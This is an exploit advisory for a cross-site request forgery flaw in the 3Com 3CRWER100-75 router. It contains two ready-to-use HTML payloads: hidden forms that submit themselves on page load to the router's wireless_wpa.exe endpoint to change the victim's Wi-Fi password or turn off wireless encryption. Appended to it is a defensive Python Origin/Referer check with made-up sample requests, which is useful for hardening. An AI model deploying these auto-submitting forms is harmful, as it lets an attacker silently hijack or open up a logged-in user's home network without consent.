3Com router 3CRWER100-75 CSRF

2014.03.23
Credit: gabry9191
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-352

##################################################################
# Exploit Name : CSRF - 3Com router - 3CRWER100-75               #
#                                                                #
# Author : gabry9191                                             #
#                                                                #
# Website : http://gabry9191.altervista.org/                     #
#                                                                #
# E-Mail : info-gabry9191@autistici.org                          #
##################################################################
#                                                                #
# This exploit works only if the user is logged in to the router #
#                                                                #
##################################################################

#########################
# Change wi-fi password #
#########################

<form name="tF" method="post" action="http://192.168.1.1/cgi-bin/wireless_wpa.exe">
<input type="hidden" value="document.location.href='wireless_wpa_psk.stm';" name="nextPage"></input>
<input type="hidden" value="Location: /wireless_wpa_psk.stm" name="nextPage2"></input>
<input name="changewep" value="0">
<input name="wpa_en" value="1">
<input name="wpa_authen" value="1">
<input name="w802_rekey" value="2">
<input name="wsec_mode" value="2">
<input name="wpa_mode" value="2">
<input name="Cypher_suite" value="2">
<input name="wpa_psk" value="0">
<input name="sharedkey" value="[PASSWORD-WI-FI]">
<input name="sharedkey1" value="[PASSWORD-WI-FI]">
<input name="obscurePSK" value="1">
</form>
<script>document.body.onload = document.forms[0].submit();</script>

##########################
# Disable wi-fi password #
##########################

<form name="tF" method="post" action="http://192.168.1.1/cgi-bin/wireless_wpa.exe">
<input name="changewep" value="0">
<input name="wsec_mode" value="1">
</form>
<script>document.body.onload = document.forms[0].submit();</script>
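
The forms above carry no per-request token and depend only on the victim being logged in, which is the CWE-352 condition. The following is an added example, not part of the original advisory or the device firmware: a server-side check that a management interface could apply to state-changing requests, comparing Origin/Referer against an allowed Host. The function names, the allowed-host set and the sample requests are assumptions constructed for illustration.

```python
from urllib.parse import urlsplit

STATE_CHANGING = {"POST", "PUT", "PATCH", "DELETE"}
ALLOWED_HOSTS = {"192.168.1.1"}  # assumption: the management address used on this page


def _authority(url):
    """Return (scheme, host[:port]) lower-cased, or None for an unusable URL."""
    parts = urlsplit(url)
    if parts.scheme not in ("http", "https") or not parts.netloc:
        return None
    return parts.scheme, parts.netloc.lower()


def is_same_origin_request(method, headers, scheme="http"):
    """Return True if the request may proceed, False if it looks cross-site."""
    if method.upper() not in STATE_CHANGING:
        return True  # only state-changing methods are gated here
    h = {k.lower(): v.strip() for k, v in headers.items()}
    host = h.get("host", "").lower()
    if host not in ALLOWED_HOSTS:
        return False  # unexpected Host header, e.g. a rebinding name
    # Prefer Origin; fall back to Referer when Origin is absent.
    source = h.get("origin") or h.get("referer")
    if not source:
        return False  # fail closed: no provenance on a state-changing request
    return _authority(source) == (scheme, host)


# Constructed sample requests (hypothetical, not captured traffic).
SAMPLES = [
    ("own page", "POST", {"Host": "192.168.1.1", "Origin": "http://192.168.1.1"}),
    ("referer only", "POST", {"Host": "192.168.1.1",
                              "Referer": "http://192.168.1.1/wireless_wpa_psk.stm"}),
    ("foreign page", "POST", {"Host": "192.168.1.1", "Origin": "http://other.example"}),
    ("opaque origin", "POST", {"Host": "192.168.1.1", "Origin": "null"}),
    ("no provenance", "POST", {"Host": "192.168.1.1"}),
    ("rebound name", "POST", {"Host": "other.example", "Origin": "http://other.example"}),
]


def classify_samples():
    """Map each sample name to True (accept) or False (reject)."""
    return {name: is_same_origin_request(m, h) for name, m, h in SAMPLES}


if __name__ == "__main__":
    for name, ok in classify_samples().items():
        print(f"{name:14} {'accept' if ok else 'reject'}")
```

A header check of this kind complements, and does not replace, a per-session anti-CSRF token on the settings forms.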

References:

http://gabry9191.altervista.org/

